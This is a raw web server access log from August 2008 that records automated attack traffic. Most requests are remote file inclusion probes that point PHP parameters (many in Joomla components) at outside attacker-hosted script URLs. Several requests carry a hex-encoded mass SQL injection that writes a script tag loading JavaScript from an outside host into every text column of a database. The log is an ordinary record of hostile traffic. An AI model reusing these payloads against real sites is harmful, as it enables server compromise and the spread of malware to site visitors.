195.13.58.250 - - [16/Aug/2008:19:51:55 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
89.208.43.121 - - [16/Aug/2008:19:52:33 -0500] "GET /logs/access_log.1213401600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:52:33 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:52:33 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:52:43 -0500] "GET /logs/access_log.1214524800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:52:43 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:52:43 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:52:56 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Avant Browser (http://www.avantbrowser.com)"
62.144.33.204 - - [16/Aug/2008:19:52:58 -0500] "GET /logs/access_log.1214524800/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:19:52:58 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.805"
62.144.33.204 - - [16/Aug/2008:19:52:58 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:53:08 -0500] "GET //PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 313 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
89.208.43.121 - - [16/Aug/2008:19:53:09 -0500] "GET /logs/access_log.1213401600//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:53:09 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.805"
216.246.8.237 - - [16/Aug/2008:19:53:09 -0500] "GET /logs/access_log.1214524800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
216.246.8.237 - - [16/Aug/2008:19:53:09 -0500] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 344 "-""libwww-perl/5.811"
216.246.8.237 - - [16/Aug/2008:19:53:09 -0500] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 349 "-""libwww-perl/5.811"
89.208.43.121 - - [16/Aug/2008:19:53:09 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
216.246.8.237 - - [16/Aug/2008:19:53:09 -0500] "GET /logs/access_log.1211500800/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://209.85.60.69/~forohipn/otro/clientscript/vbulletin_css/fonts.txt? HTTP/1.1" 404 371 "-""libwww-perl/5.811"
89.208.43.121 - - [16/Aug/2008:19:53:10 -0500] "GET /logs//PHP_CON/Exchange/include.php?webappcfg[APPPATH]=http://www.citoyennete-active.org/mambots/content/test.txt??? HTTP/1.1" 404 318 "-""MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
217.23.156.220 - - [16/Aug/2008:19:53:12 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:53:16 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Avant Browser (http://www.avantbrowser.com)"
217.23.156.220 - - [16/Aug/2008:19:54:41 -0500] "GET /logs/access_log.1208044800//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:19:54:41 -0500] "GET //errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
217.23.156.220 - - [16/Aug/2008:19:54:41 -0500] "GET /logs//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:54:44 -0500] "GET /logs/access_log.1211500800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:54:45 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:54:45 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:55:03 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:55:04 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:55:23 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:55:24 -0500] "GET /logs/access_log.1214524800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:19:55:48 -0500] "GET /logs/access_log.1214524800//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:19:56:08 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
212.150.247.23 - - [16/Aug/2008:19:56:08 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
193.200.173.5 - - [16/Aug/2008:19:56:51 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:19:56:52 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
193.200.173.5 - - [16/Aug/2008:19:56:52 -0500] "GET /logs/access_log.1209600000//modules/vwar/admin/admin.php?vwar_root=http://www.wo.passandgo.org/images/.../id2.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.805"
195.13.58.250 - - [16/Aug/2008:19:56:59 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
213.133.104.18 - - [16/Aug/2008:19:57:04 -0500] "GET /logs/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 343 "-""libwww-perl/5.808"
213.133.104.18 - - [16/Aug/2008:19:57:04 -0500] "GET /administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 338 "-""libwww-perl/5.808"
69.64.34.172 - - [16/Aug/2008:19:57:35 -0500] "GET /logs/access_log.1214524800//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:19:57:35 -0500] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:19:57:35 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.13.58.250 - - [16/Aug/2008:19:58:10 -0500] "GET /logs/access_log.1209600000/administrator/components/com_juser/xajax_functions.php?mosConfig_absolute_path=http://www.plovephotography.com/plg/phpSecurePages/v6id?? HTTP/1.1" 404 365 "-""libwww-perl/5.803"
213.188.130.113 - - [16/Aug/2008:19:59:03 -0500] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:19:59:03 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:19:59:03 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
76.181.104.143 - - [16/Aug/2008:19:59:11 -0500] "GET /logs/access_log.1205798400?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 242937 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
76.181.104.143 - - [16/Aug/2008:19:59:15 -0500] "GET /logs/access_log.1205798400?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 242937 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.150.247.23 - - [16/Aug/2008:19:59:19 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
212.150.247.23 - - [16/Aug/2008:19:59:19 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
69.64.34.172 - - [16/Aug/2008:19:59:24 -0500] "GET /logs/access_log.1211500800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:19:59:25 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:19:59:25 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:19:59:36 -0500] "GET /logs/access_log.1214524800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.64.34.172 - - [16/Aug/2008:20:00:02 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
213.188.130.113 - - [16/Aug/2008:20:00:04 -0500] "GET /logs/access_log.1208908800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
74.6.22.107 - - [16/Aug/2008:20:01:30 -0500] "GET /costume/ HTTP/1.0" 200 - "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
217.23.156.220 - - [16/Aug/2008:20:01:44 -0500] "GET /logs/access_log.1206230400//errors.php?error=http://www.acoc.co.kr/acoc/board/include/idchitoz.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.805"
76.181.104.143 - - [16/Aug/2008:20:01:56 -0500] "GET /logs/access_log.1205798400?';DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 242937 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
212.150.247.23 - - [16/Aug/2008:20:02:19 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
212.150.247.23 - - [16/Aug/2008:20:02:19 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
89.208.43.121 - - [16/Aug/2008:20:03:02 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:03:02 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
76.181.104.143 - - [16/Aug/2008:20:03:05 -0500] "GET /logs/access_log.1205798400?;DeCLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F777777332E3830306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));ExEC(@S); HTTP/1.1" 200 242937 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
64.22.89.194 - - [16/Aug/2008:20:03:42 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:03:42 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:03:46 -0500] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:03:46 -0500] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
203.183.129.14 - - [16/Aug/2008:20:05:01 -0500] "GET /logs/access_log.1211500800//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:20:05:02 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
203.183.129.14 - - [16/Aug/2008:20:05:02 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:05:20 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
212.150.247.23 - - [16/Aug/2008:20:05:20 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4"
203.183.129.14 - - [16/Aug/2008:20:05:32 -0500] "GET /logs/access_log.1213401600//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:06:02 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:06:04 -0500] "GET /logs/access_log.1214438400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
74.6.22.107 - - [16/Aug/2008:20:06:06 -0500] "GET /logs/access_log.1198800000 HTTP/1.0" 200 199457 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
64.22.89.194 - - [16/Aug/2008:20:07:26 -0500] "GET /logs/access_log.1214524800/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 372 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:07:26 -0500] "GET /components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.812"
64.22.89.194 - - [16/Aug/2008:20:07:26 -0500] "GET /logs/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://secret-admirer.info/scan/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.812"
89.208.43.121 - - [16/Aug/2008:20:07:34 -0500] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 365 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:07:35 -0500] "GET //administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 360 "-""libwww-perl/5.805"
212.150.247.23 - - [16/Aug/2008:20:07:54 -0500] "GET //admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 310 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
212.150.247.23 - - [16/Aug/2008:20:07:54 -0500] "GET /logs//admin/frontpage_right.php?loadadminpage=http://makemoneymania.info/.../rid??? HTTP/1.1" 404 315 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)"
69.73.189.205 - - [16/Aug/2008:20:07:55 -0500] "GET /logs/access_log.1213488000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
69.73.189.205 - - [16/Aug/2008:20:08:00 -0500] "GET /logs/access_log.1214179200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.desperate-souls.com/templates/portax/images/media/maxid.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:08:16 -0500] "GET /logs/access_log.1213488000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
89.208.43.121 - - [16/Aug/2008:20:08:16 -0500] "GET /logs/access_log.1213488000//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.newshop.ru/backup/safe1.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
